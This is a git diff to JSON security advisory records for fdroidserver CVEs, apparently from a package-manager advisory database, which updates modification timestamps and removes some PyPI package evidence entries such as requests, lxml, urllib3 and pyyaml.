"registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2014-1830.json b/advisories/BREW-fdroidserver-CVE-2014-1830.json index 99d5631e555..8f46bd12b16 100644 --- a/advisories/BREW-fdroidserver-CVE-2014-1830.json +++ b/advisories/BREW-fdroidserver-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2014-1830", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2014-3146.json b/advisories/BREW-fdroidserver-CVE-2014-3146.json index ddd6e1979d8..07bd714855e 100644 --- a/advisories/BREW-fdroidserver-CVE-2014-3146.json +++ b/advisories/BREW-fdroidserver-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2014-3146", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2014-3429.json b/advisories/BREW-fdroidserver-CVE-2014-3429.json index 447a79571fc..fcc04587c43 100644 --- a/advisories/BREW-fdroidserver-CVE-2014-3429.json +++ b/advisories/BREW-fdroidserver-CVE-2014-3429.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2014-3429", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-75cw-5cgv-g853", "CVE-2014-3429", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-2296.json b/advisories/BREW-fdroidserver-CVE-2015-2296.json index 64cd945ab9b..a0b0ea1763a 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-2296.json +++ b/advisories/BREW-fdroidserver-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-2296", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-4706.json b/advisories/BREW-fdroidserver-CVE-2015-4706.json index d73f78cb794..c68741461d5 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-4706.json +++ b/advisories/BREW-fdroidserver-CVE-2015-4706.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-4706", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-q326-jhw3-699g", "CVE-2015-4706", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-4707.json b/advisories/BREW-fdroidserver-CVE-2015-4707.json index 41ec35c99ba..694e8795ee8 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-4707.json +++ b/advisories/BREW-fdroidserver-CVE-2015-4707.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-4707", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-66gw-5xpf-gfp5", "CVE-2015-4707", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-5607.json b/advisories/BREW-fdroidserver-CVE-2015-5607.json index f7b9190c1c1..210879348d3 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-5607.json +++ b/advisories/BREW-fdroidserver-CVE-2015-5607.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-5607", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-7fc2-rm35-2pp7", "CVE-2015-5607", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-6938.json b/advisories/BREW-fdroidserver-CVE-2015-6938.json index b1bce08f22a..440b3d4e255 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-6938.json +++ b/advisories/BREW-fdroidserver-CVE-2015-6938.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-6938", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-4vwq-x64q-j4cj", "CVE-2015-6938", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-7337.json b/advisories/BREW-fdroidserver-CVE-2015-7337.json index 64b3de69b11..0705072d50b 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-7337.json +++ b/advisories/BREW-fdroidserver-CVE-2015-7337.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-7337", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-92mr-v722-f48m", "CVE-2015-7337", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-8557.json b/advisories/BREW-fdroidserver-CVE-2015-8557.json index a84a94b2ef7..3f8cf781ad5 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-8557.json +++ b/advisories/BREW-fdroidserver-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-8557", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2016-9015.json b/advisories/BREW-fdroidserver-CVE-2016-9015.json index 3bf291ed540..67843d3b805 100644 --- a/advisories/BREW-fdroidserver-CVE-2016-9015.json +++ b/advisories/BREW-fdroidserver-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2016-9015", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2017-18342.json b/advisories/BREW-fdroidserver-CVE-2017-18342.json index 646dbe445eb..6be2eeb9ace 100644 --- a/advisories/BREW-fdroidserver-CVE-2017-18342.json +++ b/advisories/BREW-fdroidserver-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2017-18342", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-1000805.json b/advisories/BREW-fdroidserver-CVE-2018-1000805.json index 6a6afa4cfc5..6e91e77e5ff 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-1000805.json +++ b/advisories/BREW-fdroidserver-CVE-2018-1000805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-1000805", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-f2j6-wrhh-v25m", "CVE-2018-1000805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-18074.json b/advisories/BREW-fdroidserver-CVE-2018-18074.json index 73c0af3ba13..41a4886617c 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-18074.json +++ b/advisories/BREW-fdroidserver-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-18074", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-19787.json b/advisories/BREW-fdroidserver-CVE-2018-19787.json index 5177774b248..aff1482ec11 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-19787.json +++ b/advisories/BREW-fdroidserver-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-19787", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-20060.json b/advisories/BREW-fdroidserver-CVE-2018-20060.json index 33b90c5a330..dd799a77f03 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-20060.json +++ b/advisories/BREW-fdroidserver-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-20060", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-25091.json b/advisories/BREW-fdroidserver-CVE-2018-25091.json index 0d3ebfb9ad1..4d6670c33b0 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-25091.json +++ b/advisories/BREW-fdroidserver-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-25091", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-7750.json b/advisories/BREW-fdroidserver-CVE-2018-7750.json index 3f517c5e729..1b8de33cbc3 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-7750.json +++ b/advisories/BREW-fdroidserver-CVE-2018-7750.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-7750", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-232r-66cg-79px", "CVE-2018-7750", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-11236.json b/advisories/BREW-fdroidserver-CVE-2019-11236.json index 97cad2fa680..67e7aea198c 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-11236.json +++ b/advisories/BREW-fdroidserver-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-11236", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-11324.json b/advisories/BREW-fdroidserver-CVE-2019-11324.json index a103ed152dc..5d83eef25e3 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-11324.json +++ b/advisories/BREW-fdroidserver-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-11324", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-18874.json b/advisories/BREW-fdroidserver-CVE-2019-18874.json index 21ffaa2fcc5..9e990294301 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-18874.json +++ b/advisories/BREW-fdroidserver-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-18874", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "7.2.2", - "key": "pkg:pypi/psutil@7.2.2", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-20477.json b/advisories/BREW-fdroidserver-CVE-2019-20477.json index 8179c11e5b3..5b599dac6d7 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-20477.json +++ b/advisories/BREW-fdroidserver-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-20477", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-7164.json b/advisories/BREW-fdroidserver-CVE-2019-7164.json index acdb6bb036d..163d8793bd3 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-7164.json +++ b/advisories/BREW-fdroidserver-CVE-2019-7164.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-7164", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-887w-45rq-vxgf", "CVE-2019-7164", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.52", - "key": "pkg:pypi/sqlalchemy@2.0.52", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-7548.json b/advisories/BREW-fdroidserver-CVE-2019-7548.json index d4e8e6360d5..32edd8a6666 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-7548.json +++ b/advisories/BREW-fdroidserver-CVE-2019-7548.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-7548", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-38fc-9xqv-7f7q", "CVE-2019-7548", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.52", - "key": "pkg:pypi/sqlalchemy@2.0.52", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-14343.json b/advisories/BREW-fdroidserver-CVE-2020-14343.json index 6fab48599c0..78b7542cb18 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-14343.json +++ b/advisories/BREW-fdroidserver-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-14343", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-1747.json b/advisories/BREW-fdroidserver-CVE-2020-1747.json index 5442992d625..a394ceb996c 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-1747.json +++ b/advisories/BREW-fdroidserver-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-1747", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-26137.json b/advisories/BREW-fdroidserver-CVE-2020-26137.json index 4f226b1eb5c..8fea89ea646 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-26137.json +++ b/advisories/BREW-fdroidserver-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-26137", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-27783.json b/advisories/BREW-fdroidserver-CVE-2020-27783.json index c8efa53db67..ca9c32ae343 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-27783.json +++ b/advisories/BREW-fdroidserver-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-27783", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-7212.json b/advisories/BREW-fdroidserver-CVE-2020-7212.json index 8bedfa467a9..9ad50b3084f 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-7212.json +++ b/advisories/BREW-fdroidserver-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-7212", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-20270.json b/advisories/BREW-fdroidserver-CVE-2021-20270.json index 3af77706c26..2bc9cdcd69f 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-20270.json +++ b/advisories/BREW-fdroidserver-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-20270", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-27291.json b/advisories/BREW-fdroidserver-CVE-2021-27291.json index 7b8ff82c25d..51587b5e6c1 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-27291.json +++ b/advisories/BREW-fdroidserver-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-27291", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-28363.json b/advisories/BREW-fdroidserver-CVE-2021-28363.json index c2e48e6d216..4f16c6d09e5 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-28363.json +++ b/advisories/BREW-fdroidserver-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-28363", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-28957.json b/advisories/BREW-fdroidserver-CVE-2021-28957.json index b132afe3eaf..fea21c3c2a0 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-28957.json +++ b/advisories/BREW-fdroidserver-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-28957", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-33503.json b/advisories/BREW-fdroidserver-CVE-2021-33503.json index 378e29a434f..bcac7b28cb3 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-33503.json +++ b/advisories/BREW-fdroidserver-CVE-2021-33503.json @@ -2,7 +2,7 